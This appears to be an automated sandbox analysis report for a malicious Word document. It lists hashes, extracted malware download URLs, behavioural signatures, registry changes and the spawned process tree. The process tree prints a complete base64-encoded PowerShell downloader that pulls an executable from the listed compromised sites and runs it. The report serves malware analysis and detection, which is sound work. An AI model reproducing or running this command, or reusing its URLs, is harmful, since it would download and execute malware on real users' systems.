Analysis
-
max time kernel
101s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
19-09-2024 05:59
Behavioral task
behavioral1
Sample
eab6f7a1517e79d2a72e2cc31bb1a893_JaffaCakes118.doc
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
eab6f7a1517e79d2a72e2cc31bb1a893_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
eab6f7a1517e79d2a72e2cc31bb1a893_JaffaCakes118.doc
-
Size
199KB
-
MD5
eab6f7a1517e79d2a72e2cc31bb1a893
-
SHA1
787613d2d830a0ad8c526aca34a3edb904af75e3
-
SHA256
4c6bf53f5192cfaae6652533f1980fc4c40016b9abd84823ebd3165a3d8bd024
-
SHA512
f0a683e6020e82faf1e8e98e10d32e428eed54af0aa37eebcaa4264005266fd28e4433a4a55942052beca4ffa08423f9527ca68714f995c39610183b253aab17
-
SSDEEP
3072:9WKWj22TWTogk079THcpOu5UZM5EcbWD+kzD:y/TX07hHcJQaEcKDXzD
Malware Config
Extracted
http://haymetetrading.com/wp-includes/yGELKj4/
http://simofferbd24.com/wp-includes/fsiQc/
http://401kplansinfo.com/cgi-bin/KtFRk/
http://fidelityguide.com/cgi-bin/VA/
https://sirnakmidyeci.com/wp-includes/qk9wW2/
https://subitocarne.com/wp-content/ByeOAt9/
https://eliesalibaarchitect.com/wordpress/T/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2612 2788 powershell.exe 28 -
Blocklisted process makes network request 2 IoCs
flow pid Process 8 2612 powershell.exe 12 2612 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8B0358C8-B80F-43F8-A374-366E6D55436D}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1820 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2612 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2612 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1820 WINWORD.EXE 1820 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1820 wrote to memory of 2012 1820 WINWORD.EXE 33 PID 1820 wrote to memory of 2012 1820 WINWORD.EXE 33 PID 1820 wrote to memory of 2012 1820 WINWORD.EXE 33 PID 1820 wrote to memory of 2012 1820 WINWORD.EXE 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eab6f7a1517e79d2a72e2cc31bb1a893_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -en JABVAGUAdgB3AHoAZwB6AD0AKAAoACcAQgAnACsAJwBrAG4AdAAnACkAKwAoACcANAA1ACcAKwAnAHAAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AVgA6AHUAcwBFAHIAcAByAE8ARgBpAGwAZQBcAHkAdgAzAFcAbQA5AGcAXAB3AFoATgA3ADgAZQA4AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAGUAQwBUAG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBgAFUAcgBJAGAAVABZAFAAYABSAE8AdABPAEMAYABvAGwAIgAgAD0AIAAoACgAJwB0AGwAcwAnACsAJwAxADIALAAnACkAKwAnACAAdAAnACsAKAAnAGwAJwArACcAcwAxADEALAAgAHQAJwApACsAJwBsACcAKwAnAHMAJwApADsAJABRADMAeQB3AGkAbwBvACAAPQAgACgAKAAnAFQAJwArACcAaQBpACcAKQArACgAJwAwACcAKwAnAGIAYwAnACkAKwAnAHAAJwApADsAJABFAGYAZQA1AHEAegA5AD0AKAAnAFcAJwArACgAJwB6ACcAKwAnADUAZAA0ACcAKQArACcANABlACcAKQA7ACQAQgBuAHAAXwBzADUAdgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAGcAJwArACcAUQBXAFkAJwArACcAdgAzACcAKQArACcAdwAnACsAJwBtACcAKwAnADkAZwAnACsAKAAnAGcAUQAnACsAJwBXACcAKQArACgAJwBXAHoAJwArACcAbgA3ACcAKQArACcAOABlACcAKwAoACcAOABnAFEAJwArACcAVwAnACkAKQAuACIAcgBlAHAAYABsAGAAQQBjAGUAIgAoACgAWwBDAGgAQQByAF0AMQAwADMAKwBbAEMAaABBAHIAXQA4ADEAKwBbAEMAaABBAHIAXQA4ADcAKQAsAFsAcwBUAFIASQBOAEcAXQBbAEMAaABBAHIAXQA5ADIAKQApACsAJABRADMAeQB3AGkAbwBvACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQAWABzAHQAYgB1AHgAcgA9ACgAKAAnAEcAZAAnACsAJwBlACcAKQArACgAJwB5ADcAMAAnACsAJwA5ACcAKQApADsAJABUAHIANwB5ADAAZQBnAD0AJgAoACcAbgBlAHcALQBvAGIAagAnACsAJwBlAGMAJwArACcAdAAnACkAIABOAEUAVAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABDAHgAZQBhAGsAcgBxAD0AKAAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6AC8ALwBoAGEAeQAnACsAJwBtAGUAdABlAHQAcgAnACsAJwBhAGQAaQBuAGcALgAnACkAKwAoACcAYwBvAG0AJwArACcALwB3AHAALQBpAG4AJwArACcAYwBsAHUAJwArACcAZABlACcAKQArACgAJwBzACcAKwAnAC8AeQBHACcAKQArACcARQBMACcAKwAoACcASwBqACcAKwAnADQALwAqACcAKwAnAGgAdAB0AHAAJwApACsAJwA6ACcAKwAoACcALwAvACcAKwAnAHMAJwApACsAJwBpAG0AJwArACcAbwAnACsAJwBmAGYAJwArACgAJwBlAHIAJwArACcAYgBkACcAKQArACgAJwAyADQALgAnACsAJwBjAG8AbQAnACkAKwAoACcALwB3ACcAKwAnAHAALQBpACcAKQArACgAJwBuAGMAbAB1ACcAKwAnAGQAZQAnACkAKwAnAHMAJwArACgAJwAvAGYAJwArACcAcwBpAFEAYwAnACkAKwAnAC8AKgAnACsAJwBoAHQAJwArACgAJwB0AHAAOgAvACcAKwAnAC8ANAAwADEAawBwAGwAYQAnACsAJwBuACcAKwAnAHMAJwArACcAaQBuAGYAbwAnACkAKwAoACcALgBjAG8AJwArACcAbQAnACkAKwAoACcALwBjACcAKwAnAGcAaQAnACkAKwAnAC0AYgAnACsAKAAnAGkAbgAnACsAJwAvAEsAJwArACcAdABGAFIAawAvACoAJwArACcAaAB0ACcAKQArACgAJwB0ACcAKwAnAHAAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAGYAaQAnACsAJwBkAGUAbAAnACsAJwBpAHQAeQAnACkAKwAoACcAZwB1AGkAJwArACcAZABlAC4AYwAnACsAJwBvAG0ALwAnACkAKwAnAGMAJwArACcAZwBpACcAKwAnAC0AJwArACgAJwBiAGkAbgAnACsAJwAvACcAKQArACgAJwBWAEEALwAnACsAJwAqAGgAdAAnACsAJwB0AHAAcwAnACsAJwA6AC8ALwAnACkAKwAoACcAcwAnACsAJwBpAHIAbgBhAGsAbQBpACcAKwAnAGQAeQAnACsAJwBlACcAKQArACgAJwBjAGkAJwArACcALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAJwBpAG4AJwArACcAYwAnACsAJwBsACcAKwAnAHUAZAAnACsAKAAnAGUAJwArACcAcwAvAHEAJwApACsAJwBrACcAKwAnADkAdwAnACsAKAAnAFcAMgAvACcAKwAnACoAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAcwA6ACcAKwAnAC8ALwBzAHUAYgAnACkAKwAoACcAaQB0AG8AYwBhAHIAJwArACcAbgBlACcAKQArACcALgBjACcAKwAnAG8AbQAnACsAJwAvAHcAJwArACgAJwBwAC0AYwBvACcAKwAnAG4AdABlACcAKwAnAG4AJwApACsAKAAnAHQALwAnACsAJwBCAHkAZQBPAEEAJwArACcAdAAnACkAKwAoACcAOQAvACcAKwAnACoAaAB0AHQAJwArACcAcABzADoAJwApACsAKAAnAC8ALwBlAGwAJwArACcAaQBlAHMAJwApACsAKAAnAGEAbAAnACsAJwBpAGIAJwApACsAKAAnAGEAYQAnACsAJwByAGMAJwApACsAKAAnAGgAaQB0ACcAKwAnAGUAJwArACcAYwB0ACcAKwAnAC4AYwBvAG0ALwB3ACcAKwAnAG8AcgBkAHAAcgBlACcAKwAnAHMAcwAnACsAJwAvAFQALwAnACkAKQAuACIAcwBgAFAATABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABTAHIAcAB1AGIANgA1AD0AKAAoACcASQA2AHoAJwArACcAZABfACcAKwAnAGwAJwApACsAJwByACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFEAZQBjAGcAdAA0AHkAIABpAG4AIAAkAEMAeABlAGEAawByAHEAKQB7AHQAcgB5AHsAJABUAHIANwB5ADAAZQBnAC4AIgBEAG8AYABXAG4AYABMAE8AQQBEAGYAaQBsAEUAIgAoACQAUQBlAGMAZwB0ADQAeQAsACAAJABCAG4AcABfAHMANQB2ACkAOwAkAEMAcgBjAHQAdABuAHYAPQAoACgAJwBSAGMAJwArACcAdQBtACcAKQArACcAdQAnACsAJwBrAHgAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEIAbgBwAF8AcwA1AHYAKQAuACIATABlAGAATgBgAEcAVABIACIAIAAtAGcAZQAgADMANwA5ADcANgApACAAewAmACgAJwBJAG4AdgBvAGsAJwArACcAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACgAJABCAG4AcABfAHMANQB2ACkAOwAkAEMAbgBtAG4AdgAxAGIAPQAoACcARQAxACcAKwAoACcAegAwAG4AYwAnACsAJwA5ACcAKQApADsAYgByAGUAYQBrADsAJABFAHUAbwA4AG8AaABuAD0AKAAnAFcAJwArACgAJwA3AF8AbAByACcAKwAnADQAYwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQBtADgAMABmAHYAdAA9ACgAKAAnAEEAJwArACcANgBtACcAKQArACcAeAA3ACcAKwAnAHYAbAAnACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5b51b6c77a6bdf3b36f052a2d6fd9ff5e
SHA1e2a51e08eb4e7cd57e5d7eee9c34d0ea647e47f3
SHA2564c1d48c312d6fbd9ba5b3cece47ca883f79be0a2c11e17f6a95f3cd949c6dc2e
SHA51279930d0d9a959498afc7bb2fb4d7f878cbec77bfb57e4e7977fbb4ff731112d9510d1c8a63e3f73bb0f2c152dcd54d14a2fe3bf17c377e097b3e28fc3e355c8a